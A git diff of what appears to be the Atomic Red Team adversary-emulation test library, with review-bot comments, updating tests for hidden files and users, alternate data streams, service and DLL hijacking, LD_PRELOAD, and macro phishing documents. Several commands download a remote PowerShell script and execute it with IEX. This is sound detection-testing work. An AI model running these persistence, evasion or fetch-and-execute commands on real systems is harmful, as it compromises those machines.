diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md
index 34beb7d0..35dbb5bc 100644
--- a/atomics/T1564.001/T1564.001.md
+++ b/atomics/T1564.001/T1564.001.md
@@ -33,6 +33,10 @@ Creates a hidden file inside a hidden directory
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
+
+
+
@@ -62,6 +66,10 @@ Hide a file on MacOS
**Supported Platforms:** macOS
+**auto_generated_guid:** cddb9098-3b47-4e01-9d3b-6f5f323288a9
+
+
+
@@ -87,10 +95,14 @@ and observe that the Attributes are "SA" for System and Archive.
**Supported Platforms:** Windows
+**auto_generated_guid:** f70974c8-c094-4574-b542-2c545af95a32
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | File to modify using Attrib command | string | %temp%\T1564.001.txt|
@@ -113,7 +125,7 @@ del /A:S #{file_to_modify} >nul 2>&1
##### Description: The file must exist on disk at specified location (#{file_to_modify})
##### Check Prereq Commands:
```cmd
-IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -133,10 +145,14 @@ and observe that the Attributes are "SH" for System and Hidden.
**Supported Platforms:** Windows
+**auto_generated_guid:** dadb792e-4358-4d8d-9207-b771faa0daa5
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | File to modify using Attrib command | string | %temp%\T1564.001.txt|
@@ -159,7 +175,7 @@ del /A:H #{file_to_modify} >nul 2>&1
##### Description: The file must exist on disk at specified location (#{file_to_modify})
##### Check Prereq Commands:
```cmd
-IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -178,10 +194,14 @@ Requires Apple Dev Tools
**Supported Platforms:** macOS
+**auto_generated_guid:** 3b7015f2-3144-4205-b799-b05580621379
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | path of file to hide | path | /tmp/evil|
@@ -207,6 +227,10 @@ Hide a directory on MacOS
**Supported Platforms:** macOS
+**auto_generated_guid:** b115ecaf-3b24-4ed2-aefe-2fcb9db913d3
+
+
+
@@ -236,6 +260,10 @@ Show all hidden files on MacOS
**Supported Platforms:** macOS
+**auto_generated_guid:** 9a1ec7da-b892-449f-ad68-67066d04380c
+
+
+
diff --git a/atomics/T1564.002/T1564.002.md b/atomics/T1564.002/T1564.002.md
index f5066ac0..766c53ee 100644
--- a/atomics/T1564.002/T1564.002.md
+++ b/atomics/T1564.002/T1564.002.md
@@ -19,10 +19,14 @@ Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden
**Supported Platforms:** macOS
+**auto_generated_guid:** 4238a7f0-a980-4fff-98a2-dfc0a363d507
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username to add | string | APT|
@@ -52,10 +56,14 @@ Add a hidden user on macOS using IsHidden optoin
**Supported Platforms:** macOS
+**auto_generated_guid:** de87ed7b-52c3-43fd-9554-730f695e7f31
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username to add | string | APT|
diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md
index 90ebee33..cdc08590 100644
--- a/atomics/T1564.003/T1564.003.md
+++ b/atomics/T1564.003/T1564.003.md
@@ -22,10 +22,14 @@ Upon execution a hidden PowerShell window will launch calc.exe
**Supported Platforms:** Windows
+**auto_generated_guid:** f151ee37-9e2b-47e6-80e4-550b9f999b7a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe|
diff --git a/atomics/T1564.004/T1564.004.md b/atomics/T1564.004/T1564.004.md
index 1ae1c4e7..6ad1f5eb 100644
--- a/atomics/T1564.004/T1564.004.md
+++ b/atomics/T1564.004/T1564.004.md
@@ -27,10 +27,14 @@ Execute from Alternate Streams
**Supported Platforms:** Windows
+**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f4602364f4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | Path of ADS file | path | c:\ADS\|
@@ -66,10 +70,14 @@ Upon execution cmd will run and attempt to launch desktop.ini. No windows remain
**Supported Platforms:** Windows
+**auto_generated_guid:** 2ab75061-f5d5-4c1a-b666-ba2a50df5b02
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| payload_path | Path of file to hide in ADS | path | c:\windows\system32\cmd.exe|
| ads_file_path | Path of file to create an ADS under | path | C:\Users\Public\Libraries\yanki\desktop.ini|
@@ -105,10 +113,14 @@ folder to view that the alternate data stream exists. To view the data in the al
**Supported Platforms:** Windows
+**auto_generated_guid:** 17e7637a-ddaf-4a82-8622-377e20de8fdb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name of file to create ADS on. | string | %temp%\T1564.004_has_ads_cmd.txt|
| ads_filename | Name of ADS. | string | adstest.txt|
@@ -141,10 +153,14 @@ in the %temp% direcotry to view all files with hidden data streams. To view the
**Supported Platforms:** Windows
+**auto_generated_guid:** 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name of file to create ADS on. | string | $env:TEMP\T1564.004_has_ads_powershell.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@@ -170,7 +186,7 @@ Remove-Item -Path #{file_name} -ErrorAction Ignore
##### Description: The file must exist on disk at specified location (#{file_name})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
+if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md
index 26ccd064..87730cb9 100644
--- a/atomics/T1564/T1564.md
+++ b/atomics/T1564/T1564.md
@@ -8,7 +8,7 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
- [Atomic Test #1 - Extract binary files via VBA](#atomic-test-1---extract-binary-files-via-vba)
-- [Atomic Test #2 - Create a user called "$" as noted here](#atomic-test-2---create-a-user-called--as-noted-here)
+- [Atomic Test #2 - Create a Hidden User Called "$"](#atomic-test-2---create-a-hidden-user-called-)
- [Atomic Test #3 - Create an "Administrator " user (with a space on the end)](#atomic-test-3---create-an-administrator--user-with-a-space-on-the-end)
@@ -31,6 +31,10 @@ oleObject.bin file is a payload that is parsed out and executed on the file syst
**Supported Platforms:** Windows
+**auto_generated_guid:** 6afe288a-8a8b-4d33-a629-8d03ba9dad3a
+
+
+
@@ -40,7 +44,8 @@ oleObject.bin file is a payload that is parsed out and executed on the file syst
```powershell
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
```
@@ -59,7 +64,7 @@ try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -72,12 +77,16 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
-## Atomic Test #2 - Create a user called "$" as noted here
+## Atomic Test #2 - Create a Hidden User Called "$"
Creating a user with a username containing "$"
**Supported Platforms:** Windows
+**auto_generated_guid:** 2ec63cc2-4975-41a6-bf09-dffdfb610778
+
+
+
@@ -106,6 +115,10 @@ Creating a user with a username containing with a space on the end
**Supported Platforms:** Windows
+**auto_generated_guid:** 5bb20389-39a5-4e99-9264-aeb92a55a85c
+
+
+
diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml
index 79e88e8f..c0874281 100644
--- a/atomics/T1564/T1564.yaml
+++ b/atomics/T1564/T1564.yaml
@@ -33,12 +33,13 @@ atomic_tests:
command: |
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
cleanup_command: |
Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
name: powershell
-- name: Create a user called "$" as noted here
+- name: Create a Hidden User Called "$"
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
description: Creating a user with a username containing "$"
supported_platforms:
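Review bot: The rewritten `IEX (iwr ...)` line still executes a script fetched from a mutable `master` ref with nothing checking what was served, so the test's behaviour depends on the remote content at run time; the added TLS 1.2 line protects the transport, not the payload. Since the script now lives in this repository (the URL path is `atomics/T1204.002/src/Invoke-MalDoc.ps1`) and the same command already reads local files via `PathToAtomicsFolder`, the fetch can be replaced with `IEX (Get-Content "PathToAtomicsFolder\T1204.002\src\Invoke-MalDoc.ps1" -Raw)`, assuming `PathToAtomicsFolder` resolves the same way it does for the macro file two lines above; if a remote fetch is intended, pinning the raw URL to a commit SHA instead of `master` gives the same reproducibility. The same pattern is repeated in the T1566.001.yaml hunk `@@ -55,9 +56,10 @@` and in the generated .md counterparts.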
@@ -57,4 +58,4 @@ atomic_tests:
name: powershell
elevation_required: true
command: New-LocalUser -Name "Administrator " -NoPassword
- cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
\ No newline at end of file
+ cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md
index 349306a5..4affc48e 100644
--- a/atomics/T1566.001/T1566.001.md
+++ b/atomics/T1566.001/T1566.001.md
@@ -16,10 +16,15 @@ There are many options for the attachment such as Microsoft Office documents, ex
## Atomic Test #1 - Download Phishing Attachment - VBScript
The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
The below will successfully download the macro-enabled Excel file to the current location.
+File is downloaded to the %temp% folder.
**Supported Platforms:** Windows
+**auto_generated_guid:** 114ccff9-ae6d-4547-9ead-4cd69f687306
+
+
+
@@ -31,13 +36,13 @@ if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
return 'Please install Microsoft Excel before running this test.'
}
else{
- $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+ $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
$fileName = 'PhishingAttachment.xlsm'
New-Item -Type File -Force -Path $fileName | out-null
$wc = New-Object System.Net.WebClient
$wc.Encoding = [System.Text.Encoding]::UTF8
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- ($wc.DownloadString("$url")) | Out-File $fileName
+ Invoke-WebRequest -Uri $url -OutFile $fileName
}
```
@@ -56,10 +61,14 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
**Supported Platforms:** Windows
+**auto_generated_guid:** cbb6799a-425c-4f83-9194-5447a909d67f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -69,7 +78,8 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
@@ -90,7 +100,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml
index 52fb8b73..66e9d7d0 100644
--- a/atomics/T1566.001/T1566.001.yaml
+++ b/atomics/T1566.001/T1566.001.yaml
@@ -6,6 +6,7 @@ atomic_tests:
description: |
The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
The below will successfully download the macro-enabled Excel file to the current location.
+ File is downloaded to the %temp% folder.
supported_platforms:
- windows
executor:
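Review bot: The added description sentence "File is downloaded to the %temp% folder." does not match the command in the next hunk, where `$fileName = 'PhishingAttachment.xlsm'` is a relative path and `Invoke-WebRequest -OutFile $fileName` writes to the current location, as the preceding sentence already says. Unless the executor changes directory to %temp% before running (nothing visible here does), either drop the new sentence or make the command match it with `$fileName = Join-Path $env:TEMP 'PhishingAttachment.xlsm'`, which would also give a cleanup target that does not depend on where the harness was started.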
@@ -14,13 +15,13 @@ atomic_tests:
return 'Please install Microsoft Excel before running this test.'
}
else{
- $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+ $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
$fileName = 'PhishingAttachment.xlsm'
New-Item -Type File -Force -Path $fileName | out-null
$wc = New-Object System.Net.WebClient
$wc.Encoding = [System.Text.Encoding]::UTF8
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- ($wc.DownloadString("$url")) | Out-File $fileName
+ Invoke-WebRequest -Uri $url -OutFile $fileName
}
name: powershell
- name: Word spawned a command shell and used an IP address in the command line
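Review bot: After replacing `$wc.DownloadString` with `Invoke-WebRequest`, the two `$wc = New-Object System.Net.WebClient` / `$wc.Encoding = ...` lines left as context are dead code and should be removed so a reader does not assume the WebClient encoding affects the download. The new call is also missing `-UseBasicParsing`, which the other `iwr` calls in this commit use; on Windows PowerShell 5.1 without it the cmdlet depends on the IE engine state of the machine, so `Invoke-WebRequest -Uri $url -OutFile $fileName -UseBasicParsing` is the consistent form. Nothing verifies the binary that is fetched over the network; since `bin/PhishingAttachment.xlsm` is updated in this same commit, a note in the description recording that the payload is the repository copy would help whoever runs this decide whether a local path is preferable.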
@@ -55,9 +56,10 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: |
Remove-Item #{jse_path} -ErrorAction Ignore
- name: powershell
\ No newline at end of file
+ name: powershell
diff --git a/atomics/T1566.001/bin/PhishingAttachment.xlsm b/atomics/T1566.001/bin/PhishingAttachment.xlsm
index ee236ea0..9cbfd3f7 100644
Binary files a/atomics/T1566.001/bin/PhishingAttachment.xlsm and b/atomics/T1566.001/bin/PhishingAttachment.xlsm differ
diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md
index 62e0d648..a4b90c7a 100644
--- a/atomics/T1569.001/T1569.001.md
+++ b/atomics/T1569.001/T1569.001.md
@@ -19,10 +19,14 @@ Utilize launchctl
**Supported Platforms:** macOS
+**auto_generated_guid:** 6fb61988-724e-4755-a595-07743749d4e2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_path | Path of the executable to run. | path | /System/Applications/Calculator.app/Contents/MacOS/Calculator|
| label_name | Path of the executable to run. | string | evil|
diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md
index be720344..7ecc1ec7 100644
--- a/atomics/T1569.002/T1569.002.md
+++ b/atomics/T1569.002/T1569.002.md
@@ -23,10 +23,14 @@ Upon successful execution, cmd.exe create a new service using sc.exe create that
**Supported Platforms:** Windows
+**auto_generated_guid:** 2382dee2-a75f-49aa-9378-f52df6ed3fb1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of service to create | string | ARTService|
| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt|
@@ -62,10 +66,14 @@ Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a re
**Supported Platforms:** Windows
+**auto_generated_guid:** 873106b7-cfed-454b-8680-fa9f6400431c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote hostname or IP address | string | localhost|
| user_name | Username | String | DOMAIN\Administrator|
@@ -87,7 +95,7 @@ Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a re
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
+if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md
index 2cb01cc2..3549804a 100644
--- a/atomics/T1571/T1571.md
+++ b/atomics/T1571/T1571.md
@@ -18,10 +18,14 @@ port check will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 21fe622f-8e53-4b31-ba83-6d333c2583f4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
@@ -48,10 +52,14 @@ Testing uncommonly used port utilizing telnet.
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 5db21e1d-dd9c-4a50-b885-b1e748912767
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
diff --git a/atomics/T1573/T1573.md b/atomics/T1573/T1573.md
index ae595366..ce3ca961 100644
--- a/atomics/T1573/T1573.md
+++ b/atomics/T1573/T1573.md
@@ -20,10 +20,14 @@ Upon successful execution, powershell will make a network connection to 127.0.0.
**Supported Platforms:** Windows
+**auto_generated_guid:** 21caf58e-87ad-440c-a6b8-3ac259964003
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_ip | IP of the external server | String | 127.0.0.1|
| server_port | The port to connect to on the external server | String | 443|
diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md
index beaef109..10700bb9 100644
--- a/atomics/T1574.001/T1574.001.md
+++ b/atomics/T1574.001/T1574.001.md
@@ -24,6 +24,10 @@ Upon successful execution, powershell.exe will be copied and renamed to updater.
**Supported Platforms:** Windows
+**auto_generated_guid:** 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3
+
+
+
diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md
index a5c25e44..74667b1d 100644
--- a/atomics/T1574.002/T1574.002.md
+++ b/atomics/T1574.002/T1574.002.md
@@ -18,10 +18,14 @@ Upon execution, calc.exe will be opened.
**Supported Platforms:** Windows
+**auto_generated_guid:** 65526037-7079-44a9-bda1-2cb624838040
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of the created process | string | calculator.exe|
| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder\T1574.002\bin\GUP.exe|
@@ -45,7 +49,7 @@ taskkill /F /IM #{process_name} >nul 2>&1
##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
+if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md
index 8d8a9ab8..45fef5aa 100644
--- a/atomics/T1574.006/T1574.006.md
+++ b/atomics/T1574.006/T1574.006.md
@@ -25,10 +25,14 @@ Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.pr
**Supported Platforms:** Linux
+**auto_generated_guid:** 39cb0e67-dd0d-4b74-a74b-c072db7ae991
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c|
| path_to_shared_library | Path to a shared library object | Path | /tmp/T1574006.so|
@@ -52,7 +56,7 @@ sudo sed -i '\~#{path_to_shared_library}~d' /etc/ld.so.preload
##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library})
##### Check Prereq Commands:
```bash
-if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi;
+if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
@@ -73,10 +77,14 @@ Upon successful execution, bash will utilize LD_PRELOAD to load the shared objec
**Supported Platforms:** Linux
+**auto_generated_guid:** bc219ff7-789f-4d51-9142-ecae3397deae
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c|
| path_to_shared_library | Path to a shared library object | Path | /tmp/T1574006.so|
@@ -96,7 +104,7 @@ LD_PRELOAD=#{path_to_shared_library} ls
##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library})
##### Check Prereq Commands:
```bash
-if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;
+if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
diff --git a/atomics/T1574.009/T1574.009.md b/atomics/T1574.009/T1574.009.md
index 88973d56..b32b1035 100644
--- a/atomics/T1574.009/T1574.009.md
+++ b/atomics/T1574.009/T1574.009.md
@@ -21,10 +21,14 @@ In this case, if an executable program.exe in C:\ exists, C:\program.exe will be
**Supported Platforms:** Windows
+**auto_generated_guid:** 2770dea7-c50f-457b-84c4-c40a47460d9f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_executable | Path of the executable used for the service and as the hijacked program.exe | path | PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe|
diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md
index f07dc900..821ed917 100644
--- a/atomics/T1574.011/T1574.011.md
+++ b/atomics/T1574.011/T1574.011.md
@@ -22,10 +22,14 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePa
**Supported Platforms:** Windows
+**auto_generated_guid:** f7536d63-7fd4-466f-89da-7e48d550752a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| weak_service_name | weak service check | String | weakservicename|
@@ -52,10 +56,14 @@ Change Service registry ImagePath of a bengin service to a malicious file
**Supported Platforms:** Windows
+**auto_generated_guid:** f38e9eea-e1d7-4ba6-b716-584791963827
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| weak_service_name | weak service name | String | calcservice|
| weak_service_path | weak service path | String | %windir%\system32\win32calc.exe|
@@ -80,7 +88,7 @@ sc.exe delete #{weak_service_name}
##### Description: The service must exist (#{weak_service_name})
##### Check Prereq Commands:
```powershell
-if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
+if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md
index b84c5d66..693d673f 100644
--- a/atomics/T1574.012/T1574.012.md
+++ b/atomics/T1574.012/T1574.012.md
@@ -29,10 +29,14 @@ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
**Supported Platforms:** Windows
+**auto_generated_guid:** 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll|
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
@@ -65,7 +69,7 @@ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -Er
##### Description: #{file_name} must be present
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1}
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -90,10 +94,14 @@ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
**Supported Platforms:** Windows
+**auto_generated_guid:** f373b482-48c8-4ce4-85ed-d40c8b3f7310
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll|
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
@@ -122,7 +130,7 @@ Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manage
##### Description: #{file_name} must be present
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1}
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -144,10 +152,14 @@ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
**Supported Platforms:** Windows
+**auto_generated_guid:** 79d57242-bbef-41db-b301-9d01d9f6e817
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll|
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
@@ -176,7 +188,7 @@ $env:COR_PROFILER_PATH = ''
##### Description: #{file_name} must be present
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1}
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md
index 801cec20..e3aaf7bd 100644
--- a/atomics/T1609/T1609.md
+++ b/atomics/T1609/T1609.md
@@ -17,10 +17,14 @@ Attackers who have permissions, can run malicious commands in containers in the
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| namespace | K8s namespace to use | String | default|
| command | Command to run | String | uname|
diff --git a/atomics/T1610/T1610.md b/atomics/T1610/T1610.md
index 32a1c397..6b91bb16 100644
--- a/atomics/T1610/T1610.md
